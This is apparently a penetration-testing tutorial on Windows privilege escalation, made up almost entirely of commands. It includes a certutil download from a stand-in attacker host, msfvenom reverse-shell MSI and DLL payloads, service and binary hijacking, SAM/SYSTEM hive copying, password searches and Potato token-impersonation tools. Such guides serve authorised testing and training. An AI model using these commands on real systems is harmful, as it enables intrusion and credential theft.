Windows Privilege Escalation: Essential Techniques for Pentesters

Windows privilege escalation is a critical skill for penetration testers. After gaining initial access to a Windows system, escalating to SYSTEM or Administrator privileges opens up further attack possibilities. This guide covers common Windows privilege escalation techniques.

Initial Enumeration

System Information

# System info
systeminfo
hostname

# OS version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Installed patches
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Architecture
wmic os get osarchitecture

User Information

# Current user
whoami
whoami /priv
whoami /groups

# All users
net user
net user username

# Local groups
net localgroup
net localgroup administrators

# Logged in users
query user

Network Information

# Network config
ipconfig /all

# Routing table
route print

# Active connections
netstat -ano

# Firewall status
netsh firewall show state
netsh advfirewall show allprofiles

Automated Enumeration Tools

WinPEAS

# Download and run
certutil -urlcache -f http://attacker/winPEASx64.exe winpeas.exe
.\winpeas.exe

PowerUp

powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

Seatbelt

.\Seatbelt.exe -group=all

Kernel Exploits

# Check Windows version and patches
systeminfo
wmic qfe

# Search for exploits
# Use Windows Exploit Suggester
python windows-exploit-suggester.py --database 2024.xlsx --systeminfo sysinfo.txt

# Common kernel exploits:
# MS16-032 - Secondary Logon Handle
# MS15-051 - Win32k.sys
# MS14-058 - TrackPopupMenu
# CVE-2021-1732 - Win32k Elevation

Service Misconfigurations

Unquoted Service Paths

# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# If path is: C:\Program Files\My App\service.exe
# Windows tries: C:\Program.exe, C:\Program Files\My.exe, etc.

# Exploit by placing malicious exe in writable location

Weak Service Permissions

# Check service permissions
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

# If SERVICE_CHANGE_CONFIG permission:
sc config servicename binpath= "C:\temp\shell.exe"
sc stop servicename
sc start servicename

Weak Service Binary Permissions

# Check binary permissions
icacls "C:\path\to\service.exe"

# If writable, replace with malicious binary
move service.exe service.exe.bak
copy shell.exe service.exe
sc stop servicename
sc start servicename

Registry Exploits

AlwaysInstallElevated

# Check if enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o shell.msi

# Install
msiexec /quiet /qn /i shell.msi

AutoRun Programs

# Check AutoRun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check permissions on AutoRun binaries
accesschk.exe -wvu "C:\path\to\autorun.exe"

Credential Harvesting

Saved Credentials

# Saved credentials
cmdkey /list

# If credentials exist, run as that user
runas /savecred /user:admin cmd.exe

Password Files

# Search for passwords
findstr /si password *.txt *.xml *.ini *.config
findstr /spin "password" *.*

# Common locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\sysprep\sysprep.xml

# SAM and SYSTEM files (if accessible)
copy C:\Windows\System32\config\SAM C:\temp\
copy C:\Windows\System32\config\SYSTEM C:\temp\

PowerShell History

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Token Impersonation

# Check privileges
whoami /priv

# If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:
# Use Potato attacks

# PrintSpoofer
PrintSpoofer.exe -i -c cmd

# JuicyPotato (older systems)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}

# GodPotato
GodPotato.exe -cmd "cmd /c whoami"

Scheduled Tasks

# List scheduled tasks
schtasks /query /fo LIST /v

# Check permissions on task binaries
accesschk.exe -wvu "C:\path\to\task.exe"

# If writable, replace binary
# Wait for task to execute

DLL Hijacking

# Find missing DLLs with Process Monitor
# Filter: Result contains "NAME NOT FOUND" and Path ends with ".dll"

# If application looks for DLL in writable path:
# Create malicious DLL with same name
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o missing.dll

Summary

Windows privilege escalation requires systematic enumeration and understanding of common misconfigurations. Always run automated tools like WinPEAS for comprehensive checks, but also perform manual enumeration. Focus on service misconfigurations, credential harvesting, and token impersonation as these provide the most reliable escalation paths.